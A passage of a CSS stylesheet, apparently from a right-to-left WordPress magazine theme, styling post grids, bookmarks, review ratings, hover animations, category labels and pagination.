--el-spacing: 10px; --bottom-spacing: 15px; } .p-small, .block-small .pagination-wrap { --el-spacing: 7px; --bottom-spacing: 25px; } .grid-box, .list-box { position: relative; padding: 0; border-radius: var(--wrap-border, var(--round-3)); } .grid-box .p-featured { -webkit-border-bottom-right-radius: 0; border-bottom-right-radius: 0; -webkit-border-bottom-left-radius: 0; border-bottom-left-radius: 0; } .grid-box { height: 100%; } .p-wrap > *:not(:last-child), .grid-box > *:not(:last-child), .p-content > *:not(:last-child) { margin-bottom: var(--el-spacing); } .box-border .grid-box:before, .box-border .list-box:before { position: absolute; z-index: 5; top: 0; right: 0; bottom: 0; left: 0; width: 100%; height: 100%; content: ''; pointer-events: none; border: 1px solid; border-color: var(--box-color, var(--flex-gray-15)); border-radius: var(--round-3); } .box-bg .grid-box, .box-bg .list-box { background-color: var(--box-color, var(--solid-light)); } .box-shadow .grid-box, .box-shadow .list-box { -webkit-box-shadow: 0 4px 20px var(--shadow-7); box-shadow: 0 4px 20px var(--shadow-7); } [data-theme='dark'] .box-border .grid-box:after, .light-scheme .box-border .grid-box:after, [data-theme='dark'] .box-border .list-box:after, .light-scheme .box-border .list-box:after { border-color: var(--dark-box-color, var(--flex-gray-15)); } [data-theme='dark'] .box-bg .grid-box, .light-scheme .box-bg .grid-box, [data-theme='dark'] .box-bg .list-box, .light-scheme .box-bg .list-box { background-color: var(--dark-box-color, var(--solid-light)); } .grid-box .p-content { padding: var(--box-spacing); padding-top: 0; } .counter-el { counter-increment: trend-counter; pointer-events: none; } .counter-holder { display: flex; flex-flow: row nowrap; flex-grow: 1; pointer-events: auto; } .counter-el:before { font-family: var(--h2-family); font-weight: var(--h2-fweight); font-style: var(--h2-fstyle); line-height: 1.1; display: flex; min-width: 1.1em; margin-left: 15px; content: counter(trend-counter, decimal-leading-zero); letter-spacing: var(--h2-fspace); pointer-events: none; opacity: .35; } .counter-holder .counter-el:before { min-width: auto; } .p-list .counter-el { z-index: -1; } .feat-holder { position: relative; max-width: 100%; } .p-top { display: flex; align-items: stretch; flex-flow: row wrap; width: 100%; } .entry-format-relative .p-format { display: flex; align-items: center; justify-content: center; height: 100%; margin-right: 2px; padding: 0 5px; border-radius: var(--round-3); } .entry-format-relative .p-format .gallery-count { display: none; } .entry-format-relative .p-format i { font-size: 1em; } .p-featured { position: relative; display: block; overflow: hidden; padding-bottom: 60%; border-radius: var(--wrap-border, var(--round-3)); } .p-overlay .p-featured, .p-highlight .p-featured { border-radius: 0; } .p-overlay-2.p-middle .overlay-inner.p-gradient { background: none; } .p-featured.ratio-v1 { padding-bottom: 75%; } .p-featured.ratio-v2 { padding-bottom: 85%; } .p-featured.ratio-q { padding-bottom: 100%; } .preview-video { position: absolute; z-index: 2; top: 0; right: 0; bottom: 0; left: 0; display: none; overflow: inherit; width: 100%; height: 100%; pointer-events: none; object-fit: cover; } .preview-video video { display: block; width: 100%; height: 100%; pointer-events: none; object-fit: cover; } .show-preview .preview-video { display: block; } .p-flink { position: absolute; z-index: 1; top: 0; right: 0; bottom: 0; left: 0; display: block; } .p-featured img.featured-img { position: absolute; top: 0; right: 0; bottom: 0; left: 0; width: 100%; height: 100%; margin: 0; object-fit: cover; object-position: center; } .p-meta { position: relative; display: block; } .p-wrap:not(.p-center) .p-meta.has-bookmark, .p-wrap:not(.p-center) .review-meta.has-bookmark { padding-left: 25px; } .meta-inner { display: flex; align-items: center; flex-flow: row wrap; flex-grow: 1; } .rb-bookmark { font-size: 1rem; position: absolute; z-index: 10; top: auto; right: auto; bottom: 0; left: 0; display: flex; align-items: center; justify-content: center; width: 20px; height: 100%; cursor: pointer; color: var(--body-fcolor); } .bookmarked-icon, .bookmarked i:not(.bookmarked-icon) { display: none; } .bookmarked i.bookmarked-icon { display: block; } .rb-bookmark i { -webkit-transition: var(--effect); transition: var(--effect); } .rb-bookmark:hover { color: var(--g-color); text-shadow: 0 0 4px var(--g-color-90); } .rb-bookmark.in-progress { pointer-events: none; } .remove-bookmark { display: flex; align-items: center; flex-flow: row nowrap; padding-top: 7px; -webkit-transition: var(--effect); transition: var(--effect); border-top: 1px dashed var(--flex-gray-15); } .remove-bookmark:hover { color: var(--g-color); } .remove-bookmark svg { width: 1em; } .remove-bookmark span { margin-right: 4px; } .meta-el { display: inline-flex; align-items: center; flex-flow: row wrap; } .meta-category a { color: var(--cat-highlight, inherit); } .meta-el:first-child:before, .meta-el:first-of-type:before { display: none; } .meta-el i { margin-left: 5px; } .meta-el:not(.meta-author) a:after { display: inline-block; padding: 0 3px; content: '/'; text-decoration: none !important; letter-spacing: 0; opacity: .4; color: var(--body-fcolor); } .meta-el a:last-child:after { display: none; } .meta-avatar { display: flex; align-items: center; flex-flow: row nowrap; flex-shrink: 0; margin-left: 5px; } body .meta-avatar img { display: inline-flex; width: 22px; height: 22px; border-radius: 100%; object-fit: cover; } .meta-avatar.multiple-meta-avatar img:not(:first-child) { margin-right: -12px; } .smeta-in > .meta-avatar.multiple-meta-avatar img:not(:first-child) { margin-right: 3px; } .co-author { display: inline-flex; align-items: center; } .co-authors .co-author:after { font-size: var(--em-mini); font-weight: normal; display: inline-flex; margin-right: 3px; margin-left: 3px; content: '/'; opacity: .5; } .co-authors .co-author:last-child:after { display: none; } span.entry-title { display: block; } .p-url { font-size: var(--title-size, inherit); text-underline-offset: 1px; } .sticky .entry-title a:before, .sticky .s-title:before { font-family: 'ruby-icon'; font-size: 1em; margin-left: .3em; padding: 0; content: '\e962' !important; color: inherit; background: none; } .meta-label { margin-left: .35em; } .meta-author { -webkit-transition: var(--effect); transition: var(--effect); } .is-meta .meta-author a, .meta-category a, .breadcrumb-inner a, .efoot a { -webkit-transition: var(--effect); transition: var(--effect); text-decoration-line: underline; text-decoration-color: transparent; text-underline-offset: 1px; } .is-meta a:hover, .single-meta .meta-author a, .ubox .nname-info .nice-name, .sponsor-link:hover .is-text, .breadcrumb-inner a:hover, .efoot a:hover { text-decoration: underline; text-decoration-color: var(--g-color); } .single-meta .meta-author a:hover, a.nice-name:hover { color: var(--g-color) } .is-meta .meta-category a:hover { text-decoration-color: var(--cat-highlight, var(--g-color)); } .post-edit-link { font-size: var(--rem-mini); line-height: 1; position: absolute; z-index: 9999; top: 0; left: 10px; display: block; visibility: hidden; padding: 5px; -webkit-transition: var(--effect); transition: var(--effect); opacity: 0; color: #fff !important; background-color: #333; } .post-slider .post-edit-link { right: 0; left: auto; } .notification-content .post-edit-link { display: none; } .p-wrap:hover .post-edit-link, .holder-wrap:hover .post-edit-link { visibility: visible; opacity: 1; } .post-edit-link:hover { background-color: var(--g-color); } .entry-format-absolute { line-height: 0; position: absolute; z-index: 2; top: 0; bottom: auto; left: 0; display: flex; align-items: flex-end; justify-content: flex-end; pointer-events: none; } .p-format i { font-size: inherit; line-height: 1; display: block; } .p-format .rbi-video { -webkit-transform: scale(1.1); transform: scale(1.1); } .entry-format-absolute.format-style-bottom { z-index: 100; top: auto; right: auto; bottom: 0; left: 0; } .entry-format-absolute.format-style-top { z-index: 11; } .entry-format-absolute.format-style-bottom .p-format { position: relative; padding: 7px 7px 5px 5px; color: var(--body-fcolor); border-radius: 0 50% 0 0; background-color: var(--solid-white); } .grid-box .entry-format-absolute.format-style-bottom .p-format { background-color: var(--box-color, var(--solid-light)); } [data-theme='dark'] .grid-box .entry-format-absolute.format-style-bottom .p-format, .light-scheme .grid-box .entry-format-absolute.format-style-bottom .p-format { background-color: var(--dark-box-color, var(--solid-light)); } .format-style-bottom .p-format { font-size: 20px; } .gallery-count { line-height: 1; position: absolute; top: 0; left: 0; padding: 4px; } .format-style-bottom .gallery-count { font-size: 10px; line-height: 14px; top: 2px; left: 0; display: block; width: 14px; height: 14px; padding: 0; text-align: center; color: var(--absolute-white); border-radius: 100%; background-color: var(--g-color); } .entry-format-absolute.format-style-top { font-size: 26px; right: 0; } .entry-format-absolute.format-style-center { top: 50%; right: 50%; left: auto; align-items: center; justify-content: center; width: 60px; height: 60px; margin-top: -30px; margin-right: -30px; } .entry-format-absolute.format-style-center .p-format { font-size: 40px; display: inline-flex; background-color: transparent; text-shadow: 0 0 10px rgba(0, 0, 0, .25); } .entry-format-absolute.format-style-top .p-format { display: block; margin-right: auto; padding: .3em; } .entry-format-absolute.format-style-top .p-format:after { position: absolute; top: 0; right: 0; left: 0; height: 3px; content: ''; } .entry-format-absolute.format-style-center .gallery-count { font-size: var(--rem-small); position: relative; top: auto; left: auto; display: inline-flex; justify-content: flex-start; margin-top: -.75em; } .format-style-top .p-format:after { background-color: var(--video-color); } .p-format.format-gallery, .format-style-top .p-format.format-gallery:after { background-color: var(--gallery-color); } .p-format.format-audio, .format-style-top .p-format.format-audio:after { background-color: var(--audio-color); } .format-style-top .gallery-count { font-weight: 700; border-radius: var(--round-7); background-color: inherit; } .p-readmore { line-height: 1; display: inline-flex; align-items: center; flex-flow: row nowrap; padding: 7px 15px; -webkit-transition: var(--effect); transition: var(--effect); border: 1px solid var(--g-color); border-radius: var(--round-3); } .p-readmore i, .pagination-simple i { font-size: var(--em-small); margin-right: .4em; -webkit-transition: transform .25s var(--timing); transition: transform .25s var(--timing); } .pagination-simple .newer i { margin-right: 0; margin-left: .4em; } .p-readmore:hover { color: var(--absolute-white); background: var(--g-color); -webkit-box-shadow: 0 0 10px var(--g-color-90); box-shadow: 0 0 10px var(--g-color-90); } .p-readmore:hover i, .pagination-simple a:hover i { -webkit-transform: translateX(-3px); transform: translateX(-3px); } .pagination-simple .newer a:hover i { -webkit-transform: translateX(3px); transform: translateX(3px); } .review-meta { position: relative; display: block; } .p-center .review-meta.has-bookmark { display: flex; flex-flow: row nowrap; justify-content: center; width: 100%; } .review-meta.type-star { padding-top: 2px; } .review-meta-inner { display: flex; align-items: center; flex-flow: row nowrap; } .review-meta-inner .extra-meta { display: flex; align-items: center; } .review-meta-inner .extra-meta:before { display: inline-flex; width: 3px; height: 3px; margin-right: .6em; margin-left: .6em; content: ''; opacity: .5; border-radius: 100%; background-color: currentColor; } .rline-wrap { position: relative; display: inline-flex; flex-flow: row nowrap; margin-left: 9px; } .rline { display: inline-flex; width: 20px; height: 7px; margin-left: 1px; background-color: var(--flex-gray-15); } .rline:nth-child(1) { background-color: #ff0d0d; } .rline:nth-child(2) { background-color: #ff5612; } .rline:nth-child(3) { background-color: #ffa444; } .rline:nth-child(4) { background-color: #a0b339; } .rline:nth-child(5) { background-color: #50a735; } .rline:not(.activated) { background-color: var(--flex-gray-15); } .rstar-wrap { position: relative; display: inline-flex; overflow: hidden; margin-left: 8px; color: #fff; } .rstar { position: relative; display: inline-flex; align-items: center; justify-content: center; width: 20px; height: 20px; margin-left: 1px; } .rstar:before { position: absolute; z-index: 0; top: 0; right: 0; bottom: 0; left: 0; content: ''; background-color: var(--flex-gray-15); } .review-description { white-space: nowrap; } .review-description strong { font-weight: var(--meta-b-fweight); } .rstar:last-child { margin-left: 0; } .rstar i { font-size: 14px; line-height: 1; position: relative; z-index: 10; } .rstar-bg { position: absolute; z-index: 1; top: 0; right: 0; bottom: 0; left: 0; background-image: linear-gradient(to left, var(--review-color) 95%, transparent 5%); background-image: -webkit-linear-gradient(right, var(--review-color) 95%, transparent 5%); background-position: 100% 0; background-size: 21px 20px; } .hover-ani-2 .p-url { -webkit-transition: all 0.25s var(--timing); transition: all 0.25s var(--timing); } .hover-ani-2 .p-url:hover { color: var(--g-color); } .hover-ani-2[data-theme='dark'] .p-url:hover, .hover-ani-2 .overlay-text .p-url:hover, .hover-ani-2 .light-scheme .p-url:hover { opacity: .7; color: var(--absolute-white); } .hover-ani-1 .p-url { -webkit-transition: all .25s var(--timing); transition: all .25s var(--timing); text-decoration-line: underline; text-decoration-color: transparent; -webkit-text-decoration-color: transparent; -moz-text-decoration-color: transparent; text-decoration-thickness: .1em; } .hover-ani-1 .p-url:hover { text-decoration-color: var(--g-color); -webkit-text-decoration-color: var(--g-color); } body:not([data-theme='dark']).hover-ani-1 .p-url:hover { color: var(--g-color); } body.hover-ani-1 .light-scheme .p-url:hover, body:not([data-theme='dark']).hover-ani-1 .overlay-text .p-url:hover { color: var(--absolute-white); } .hover-ani-3 .p-url { -webkit-transition: background-position 0.2s ease; transition: background-position 0.2s ease; background-image: -webkit-gradient(linear, right top, right bottom, from(currentColor), to(currentColor)); background-image: linear-gradient(currentColor, currentColor); background-repeat: no-repeat; background-position: right 102%; -webkit-background-size: 100% 0; background-size: 100% 0; will-change: background-position; } .hover-ani-3 .p-url:hover { background-position: right calc(100% - .1em); -webkit-background-size: 100% 2px; background-size: 100% 2px; } .hover-ani-4 .p-url { -webkit-transition: background-size 0.25s var(--timing); transition: background-size 0.25s var(--timing); background-image: -webkit-gradient(linear, right top, right bottom, from(var(--g-color-90)), to(var(--g-color-90))); background-image: linear-gradient(var(--g-color-90), var(--g-color-90)); background-repeat: no-repeat; background-position: 100% 100%; background-size: 100% 0%; } .hover-ani-4 .p-url:hover { background-size: 100% 30%; } .hover-ani-5 .p-url { -webkit-transition: background-size 0.4s ease, color 0.4s ease; transition: background-size 0.4s ease, color 0.4s ease; background-image: -webkit-gradient(linear, right top, right bottom, from(var(--g-color)), to(var(--g-color))); background-image: linear-gradient(var(--g-color), var(--g-color)); background-repeat: no-repeat; background-position: 100% 100%; background-size: 0% 100%; } .hover-ani-5 .p-url:hover { color: var(--absolute-white); background-size: 100% 100%; } .hover-ani-6 .p-url { -webkit-transition: background-size 0.25s var(--timing); transition: background-size 0.25s var(--timing); background-image: -webkit-gradient(linear, right top, right bottom, from(currentColor), to(currentColor)); background-image: linear-gradient(currentColor, currentColor); background-repeat: no-repeat; background-position: bottom right; -webkit-background-size: 0% 1px; background-size: 0% 1px; } .hover-ani-6 .p-url:hover { -webkit-background-size: 100% 1px; background-size: 100% 1px; } @keyframes hover-ani-7 { 0% { background-size: 0% 5px; -webkit-background-size: 0% 5px; } 50% { background-size: 100% 5px; -webkit-background-size: 100% 5px; background-position: bottom right; } 51% { background-size: 100% 5px; -webkit-background-size: 100% 5px; background-position: bottom left; } 100% { background-size: 0% 5px; -webkit-background-size: 0% 5px; background-position: bottom left; } } @-webkit-keyframes hover-ani-7 { 0% { background-size: 0% 5px; -webkit-background-size: 0% 5px; } 50% { background-size: 100% 5px; -webkit-background-size: 100% 5px; background-position: bottom right; } 51% { background-size: 100% 5px; -webkit-background-size: 100% 5px; background-position: bottom left; } 100% { background-size: 0% 5px; -webkit-background-size: 0% 5px; background-position: bottom left; } } .hover-ani-7 .p-url { background-image: -webkit-gradient(linear, right top, right bottom, from(var(--g-color)), to(var(--g-color))); background-image: linear-gradient(var(--g-color), var(--g-color)); background-repeat: no-repeat; background-position: bottom right; -webkit-background-size: 0% 5px; background-size: 0% 5px; } .hover-ani-7 .p-url:hover { -webkit-animation: hover-ani-7 1.5s ease; animation: hover-ani-7 1.5s ease; } .hover-ani-8 .p-url { -webkit-transition: opacity .25s var(--timing); transition: opacity .25s var(--timing); opacity: 1; } .hover-ani-8 .p-url:hover { opacity: .5; } .bookmark-info { position: fixed; z-index: 5000; right: 0; bottom: 60px; left: 0; display: none; width: 100%; text-align: center; } .bookmark-holder { display: inline-flex; overflow: hidden; align-items: stretch; flex-flow: row nowrap; width: 100%; max-width: 370px; -webkit-border-radius: var(--round-7); border-radius: var(--round-7); background-color: var(--solid-white); -webkit-box-shadow: 0 4px 30px var(--shadow-12); box-shadow: 0 4px 30px var(--shadow-12); } .bookmark-featured { position: relative; flex-shrink: 0; width: 90px; } .bookmark-featured img { position: absolute; top: 0; right: 0; width: 100%; height: 100%; } .bookmark-inner { display: flex; flex-flow: column nowrap; flex-grow: 1; padding: 15px; } .bookmark-title { display: inline-block; overflow: hidden; max-width: 235px; white-space: nowrap; text-overflow: ellipsis; color: #649f74; } .bookmark-desc { font-size: var(--rem-mini); line-height: 1.5; display: block; margin-top: 5px; text-align: right; color: var(--meta-fcolor); } .bookmark-info.removed .bookmark-title { color: #ff7142; } .bookmark-remove-holder { font-size: var(--rem-mini); align-items: center; padding: 15px 20px; } .bookmark-undo { margin-right: auto; -webkit-transition: var(--effect); transition: var(--effect); color: #649f74; } .bookmark-undo:hover { text-decoration: underline; } .bookmark-remove-holder p { font-size: var(--rem-mini); } [data-theme='dark'] .bookmark-title, [data-theme='dark'] .bookmark-undo { color: #7cffb9; } .p-category { font-family: inherit; font-weight: inherit; font-style: inherit; line-height: 1; position: relative; z-index: 1; display: inline-flex; flex-shrink: 0; } .p-category:not(:last-child) { margin-left: 3px; } .s-cats .p-category:not(:last-child) { margin-bottom: 3px; } .ecat-bg-1 .p-category, .ecat-bg-2 .p-category, .ecat-bg-3 .p-category { padding: 7px 12px; -webkit-transition: all .25s var(--timing); transition: all .25s var(--timing); text-decoration: none; color: var(--cat-fcolor, var(--absolute-white)); } .ecat-border .p-category { padding: 7px 12px; -webkit-transition: all .25s var(--timing); transition: all .25s var(--timing); text-decoration: none; color: var(--cat-highlight, var(--g-color)); border: 1px solid var(--cat-highlight, var(--g-color)); -webkit-border-radius: 999px; border-radius: 999px; } .ecat-bg-3 .p-category { padding-right: 15px; padding-left: 15px; -webkit-border-radius: 100px; border-radius: 100px; background-color: var(--cat-highlight, var(--g-color)); } .ecat-bg-4 .p-category { padding: 3px 7px; -webkit-transition: all .25s var(--timing); transition: all .25s var(--timing); text-decoration: none; color: var(--cat-fcolor, var(--absolute-white)); -webkit-border-radius: var(--round-3); border-radius: var(--round-3); background-color: var(--cat-highlight, var(--g-color)); } .ecat-bg-3 .post-edit-link { right: 10px; left: auto; } .ecat-bg-1 .p-category:before, .ecat-bg-2 .p-category:before { position: absolute; z-index: -1; top: 0; right: 0; bottom: 0; left: 0; display: block; content: ''; -webkit-transition: -webkit-box-shadow .25s var(--timing); transition: box-shadow .25s var(--timing); border-radius: var(--round-3); background-color: var(--cat-highlight, var(--g-color)); } .ecat-bg-1 .p-category:before { -webkit-transform: skewX(25deg); transform: skewX(25deg); } .ecat-bg-1 .p-category:hover:before, .ecat-bg-2 .p-category:hover:before, .ecat-bg-3 .p-category:hover, .ecat-bg-4 .p-category:hover { -webkit-box-shadow: 0 0 10px var(--cat-highlight-90, var(--g-color-90)); box-shadow: 0 0 10px var(--cat-highlight-90, var(--g-color-90)); } .ecat-text .p-category { line-height: 1.5; transition: var(--effect); vertical-align: middle; color: var(--cat-highlight, inherit); --webkit-transition: var(--effect); } .ecat-text .p-category:not(:first-child):before { display: inline-block; justify-content: center; margin-left: 3px; content: '/'; opacity: .4; color: var(--body-fcolor); } .ecat-bg-1 .feat-holder .p-top, .ecat-bg-2 .feat-holder .p-top { position: absolute; z-index: 20; right: 0; bottom: -2px; margin-bottom: 0; } .p-grid.ecat-bg-2:not(.p-center) .feat-holder .p-top { padding-right: 7px; } .ecat-l-dot .overlay-text .p-category, .ecat-b-border .overlay-text .p-category, .ecat-text .overlay-text .p-category, .ecat-border .overlay-text .p-category, .ecat-b-dotted .overlay-text .p-category, .overlay-text .ecat-l-dot .p-category, .overlay-text .ecat-b-border .p-category, .overlay-text .ecat-text .p-category, .overlay-text .ecat-border .p-category, .overlay-text .ecat-b-dotted .p-category { color: var(--absolute-white); } .ecat-l-dot .p-category:before { display: inline-flex; width: 1em; height: 1em; margin-left: 7px; content: ''; -webkit-border-radius: 100%; border-radius: 100%; background-color: var(--cat-highlight, var(--g-color)); } .ecat-l-dot .p-category { -webkit-transition: var(--effect); transition: var(--effect); text-decoration: underline dotted transparent; } .ecat-l-dot .p-category:hover { text-decoration-color: var(--cat-highlight, currentColor); } .ecat-l-dot .p-category:not(:last-child) { margin-left: 7px; } .ecat-b-dotted .p-category { -webkit-transition: var(--effect); transition: var(--effect); border-bottom: 3px dotted var(--cat-highlight, var(--g-color)); } .ecat-b-dotted .p-category:not(:last-child), .ecat-b-border .p-category:not(:last-child) { margin-left: 7px; } .ecat-b-border .p-category:before { position: absolute; z-index: -1; right: 0; bottom: 0; display: block; width: 100%; height: 5px; content: ''; -webkit-transition: var(--effect); transition: var(--effect); background-color: var(--cat-highlight, var(--g-color)); } .ecat-b-border .p-category:hover:before { height: 1px; } .ecat-text .entry-format-relative .p-format, .ecat-b-border .entry-format-relative .p-format, .ecat-b-dotted .entry-format-relative .p-format { color: var(--video-color); background-color: transparent; } .ecat-b-text .entry-format-relative .p-format.format-gallery, .ecat-b-border .entry-format-relative .p-format.format-gallery, .ecat-b-dotted .entry-format-relative .p-format.format-gallery { color: var(--gallery-color); } .ecat-b-text .entry-format-relative .p-format.format-gallery, .ecat-b-border .entry-format-relative .p-format.format-audio, .ecat-b-dotted .entry-format-relative .p-format.format-gallery { color: var(--audio-color); } .ecat-bg-3 .feat-holder .p-top { position: absolute; z-index: 10; top: 10px; right: auto; left: 10px; justify-content: flex-end; width: auto; margin-bottom: 0; } .ecat-bg-4 .feat-holder .p-top { position: absolute; z-index: 10; right: 0; bottom: 0; margin-bottom: 0; } .ecat-bg-1 .spacing, .ecat-bg-2 .spacing { display: block; height: 0; padding-bottom: 5px; } .ecat-text .p-category:hover, .ecat-border .p-category:hover { opacity: .7; } .ecat-b-dotted .p-category:hover { color: var(--cat-highlight, var(--g-color)); } .ecat-b-dotted .overlay-text .p-category:hover { color: var(--absolute-light); } .is-p-protected a:before { font-family: var(--cat-family); font-size: var(--cat-fsize); font-weight: var(--cat-fweight); font-style: var(--cat-fstyle); line-height: 1; display: none; margin-left: 5px; padding: 3px 8px; content: ''; vertical-align: .25em; text-decoration: none; color: var(--absolute-white); border-radius: var(--round-3); background-color: var(--g-color); } .exclusive-style-border .is-p-protected a:before { color: inherit; border: 1px solid var(--g-color); -webkit-border-radius: var(--round-3); border-radius: var(--round-3); background: none; } .p-format { line-height: 1; position: static; pointer-events: none; color: var(--absolute-white); border-bottom-right-radius: var(--round-3); background-color: var(--video-color); } .p-content { position: relative; } .p-grid-small-1 .counter-el:before { font-size: 2.5rem; margin-left: var(--el-spacing); opacity: 1; color: var(--g-color); } .p-list-small-2 { display: flex; flex-flow: row nowrap; } .p-list-small-2 .counter-el { position: absolute; top: 0; left: 0; } .p-list-small-2.right-featured .counter-el { right: 0; left: auto; } .p-grid-1 .counter-el, .p-grid-2 .counter-el { position: absolute; top: auto; left: 0; } .p-list-small-1 .counter-el { position: absolute; top: auto; bottom: 0; left: 0; } .p-overlay .counter-el, .p-highlight .counter-el { position: absolute; top: auto; bottom: 0; left: 0; margin: 0; } .p-grid-box-1 .counter-el, .p-grid-box-2 .counter-el { position: absolute; top: auto; left: var(--box-spacing); } .grid-box .feat-holder .p-top { padding-right: var(--box-spacing); } .p-list-small-1 .counter-el:before, .p-list-small-2 .counter-el:before, .p-grid-1 .counter-el:before, .p-grid-2 .counter-el:before, .p-grid-box-1 .counter-el:before, .p-grid-box-2 .counter-el:before, .p-overlay .counter-el:before, .p-highlight .counter-el:before { font-size: 3.5rem; line-height: 1; margin-left: 0; opacity: .15; } .p-highlight .counter-el:before, .p-overlay .counter-el:before { min-width: auto; } .p-grid-2 .p-content { padding-top: 5px; } .p-grid-box-1 .counter-el:before, .p-grid-box-2 .counter-el:before { justify-content: flex-end; } .p-list-small-2 .feat-holder { flex-shrink: 0; width: 100px; margin-left: var(--featured-spacing, 15px); } .p-list-small-2 .p-content { flex-grow: 1; } .p-list-small-2 .p-format i { -webkit-transform: scale(.83); transform: scale(.83); } .p-wrap.p-list-small-2 .feat-holder, .p-wrap.p-list-small-2 .p-meta { margin-bottom: 0; } .right-featured { flex-direction: row-reverse; } .p-list-small-2.right-featured .feat-holder { margin-right: var(--featured-spacing, 15px); margin-left: 0; } .p-list-small-3 .p-featured { border-radius: 100%; } .p-list-small-3 { align-items: center; } .p-list-small-3 .counter-el { top: 0; } .list-holder { display: flex; align-items: center; flex-flow: row wrap; margin-right: var(--list-holder-margin, -15px); margin-left: var(--list-holder-margin, -15px); } .list-holder > * { flex-grow: 1; width: 100%; max-width: 100%; padding-right: var(--list-holder-spacing, 15px); padding-left: var(--list-holder-spacing, 15px); } .p-wrap.p-vtop .list-holder { align-items: flex-start; } .p-wrap.p-middle .list-holder { align-items: center; } .p-wrap.p-vbottom .list-holder { align-items: flex-end; } .sponsor-inner, .sponsor-icon { display: flex; align-items: center; flex-flow: row nowrap; } .sponsor-label { white-space: nowrap; } .p-wrap .sponsor-label { color: var(--g-color); } .light-scheme .sponsor-label, [data-theme='dark'] .sponsor-label { color: var(--absolute-light); } .sponsor-inner > *:not(:last-child) { margin-left: 5px; } .sponsor-icon i { font-size: 1em; } .spon-qview .sponsor-icon i { font-size: 1.15em; } .sponsor-meta { position: relative; display: flex; align-items: center; flex-flow: row nowrap; width: 100%; } .p-center .sponsor-meta { justify-content: center; } .sponsor-meta .sponsor-link { display: flex; align-items: center; } .sponsor-meta img { width: auto; height: auto; max-height: 1.8em; } .p-small .sponsor-meta img { max-height: 1.4em; } .sponsor-brand-light { display: none; } body[data-theme='dark'] .sponsor-brand-light, body .overlay-text .sponsor-brand-light, body .block-wrap.light-scheme .sponsor-brand-light { display: block !important; } body[data-theme='dark'] .sponsor-brand-default, .overlay-text .sponsor-brand-default { display: none; } .s-title-sticky { display: none; align-items: center; flex-flow: row nowrap; flex-grow: 1; margin-right: 10px; color: var(--nav-color); } .s-title-sticky-left { display: flex; align-items: center; flex-flow: row nowrap; flex-grow: 1; } .sticky-share-list { display: flex; align-items: center; flex-flow: row nowrap; flex-shrink: 0; height: 100%; margin-left: 5px; } .sticky-share-list .t-shared-header { opacity: .5; } .sticky-title-label { font-size: var(--em-small); margin-left: 7px; text-transform: uppercase; opacity: .5; } .sticky-title { display: block; overflow: hidden; width: 100%; max-width: 600px; white-space: nowrap; text-overflow: ellipsis; } .t-shared-header { align-items: center; flex-flow: row nowrap; margin-left: 6px; white-space: nowrap; } .t-shared-header i { font-size: var(--em-small); margin-left: 5px; } .sticky-share-list-items { align-items: center; height: 100%; } .sticky-share-list-buffer { display: none; } /* ----------------- 7 - Post Modules ----------------- */ .p-list-inline { display: flex; width: 100%; --bottom-spacing: 7px; } .p-list-inline i { font-size: 8px; line-height: 8px; display: inline; width: 8px; height: 8px; margin-left: .3em; -webkit-transition: var(--effect); transition: var(--effect); vertical-align: middle; } .p-list-inline .entry-title:hover i { color: var(--g-color); -webkit-border-radius: 100%; border-radius: 100%; background-color: var(--g-color); } [data-theme='dark'] .p-list-inline .entry-title:hover i { color: var(--absolute-white); background-color: var(--absolute-white); } .overlay-text .p-list-inline .entry-title:hover i { color: var(--absolute-white); background-color: var(--absolute-white); } .p-highlight, .overlay-holder { position: relative; overflow: hidden; border-radius: var(--wrap-border, var(--round-3)); } .p-center .p-content { text-align: center; } .p-center:not(.p-list-1) .p-top, .p-center .review-meta-inner { justify-content: center; padding-right: 0; padding-left: 0; --box-spacing: 0; } .p-center .p-meta { display: flex; flex-flow: row nowrap; justify-content: center; } .p-center .meta-inner { flex-grow: 0; } .p-center .rb-bookmark { position: relative; margin-right: 7px; } .p-center .counter-holder .counter-el { position: absolute; right: 50%; bottom: 0; -webkit-transform: translateX(50%); transform: translateX(50%); opacity: .2; } .p-center .counter-holder { position: relative; } .p-middle.p-small { align-items: center; } .p-middle.p-highlight .overlay-wrap, .p-middle.p-overlay .overlay-wrap { align-items: center; } .p-middle.p-highlight .overlay-wrap:before, .p-middle.p-overlay .overlay-wrap:before { position: absolute; top: 0; right: 0; bottom: 0; left: 0; display: block; width: 100%; content: ''; opacity: .7; background: var(--dark-accent); } .p-vtop.p-highlight .overlay-wrap, .p-vtop.p-overlay .overlay-wrap { align-items: flex-start; } .p-classic .p-content { max-width: var(--content-width, 100%); margin-right: auto; margin-left: auto; } /* ----------------- 8 - Blocks ----------------- */ .block-wrap { position: relative; display: block; counter-reset: trend-counter; } .block-wrap .rb-error { padding: 20px; text-align: center; color: var(--meta-fcolor); } .bottom-border .block-inner > * { padding-bottom: var(--bottom-spacing); } .bottom-border .block-inner > *:before { position: absolute; top: auto; right: var(--column-gap, 0); bottom: 0; left: var(--column-gap, 0); height: 1px; content: ''; pointer-events: none; border-bottom: 1px var(--bottom-border-style, solid) var(--bottom-border-color); } .bottom-border.no-last-bb .block-inner > *:last-child:before { border-bottom: none; } .bottom-border.no-last-bb .block-inner > *:last-child { padding-bottom: 0; } .is-border-dark { --column-border-color: currentColor; } .is-b-border-dark { --bottom-border-color: currentColor; } .is-border-gray-dot { --column-border-style: dotted; } .is-b-border-gray-dot { --bottom-border-style: dotted; } .is-border-dark-dot { --column-border-style: dotted; --column-border-color: currentColor; } .is-b-border-dark-dot { --bottom-border-style: dotted; --bottom-border-color: currentColor; } .is-border-gray-dash { --column-border-style: dashed; } .is-b-border-gray-dash { --bottom-border-style: dashed; } .is-border-dark-dash { --column-border-style: dashed; --column-border-color: currentColor; } .is-b-border-dark-dash { --bottom-border-style: dashed; --bottom-border-color: currentColor; } .elementor-column.rb-sticky { position: relative; align-items: flex-start; } .rb-sticky > * { position: -webkit-sticky; position: sticky; top: 12px; -webkit-transition: top .3s ease; transition: top .3s ease; will-change: top; } .rb-error a { text-decoration: underline; } .rb-error a:hover { color: var(--g-color); } .scroll-holder { scrollbar-color: var(--shadow-7) var(--flex-gray-15); scrollbar-width: thin; } .short-pagination .pagination-nextprev { justify-content: flex-start; } .short-pagination .pagination-nextprev a > span { display: none; } .short-pagination .pagination-nextprev > *:first-child { margin-left: 5px } .pagination-nextprev > * { justify-content: center; min-width: 135px; } .short-pagination .pagination-nextprev > * { min-width: 0; } .short-pagination .pagination-trigger { padding: 0 10px; } .scroll-holder::-webkit-scrollbar { width: 5px; -webkit-border-radius: var(--round-7); border-radius: var(--round-7); background: var(--flex-gray-7); } .scroll-holder::-webkit-scrollbar-thumb { -webkit-border-radius: var(--round-7); border-radius: var(--round-7); background-color: var(--flex-gray-15); } 